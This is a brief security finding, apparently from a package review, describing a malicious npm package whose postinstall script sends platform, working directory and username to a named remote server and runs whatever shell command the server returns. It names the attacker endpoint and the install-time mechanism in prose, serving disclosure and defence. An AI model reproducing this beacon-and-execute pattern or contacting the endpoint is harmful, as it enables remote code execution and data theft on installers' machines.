On npm install, postinstall.js collects platform, Node version, current working directory, and OS username, then POSTs them as JSON to https://sec5.bestlzk.cn/v2/report. The HTTPS response body is parsed as JSON and the config.setup field is passed directly to child_process.exec, executing whatever shell command the remote server returns on the installer's machine. The package ships with empty author/description metadata and no functional library code — its sole on-install effect is this C2 beacon plus remote shell execution. This is install-time remote code execution by a hardcoded attacker endpoint.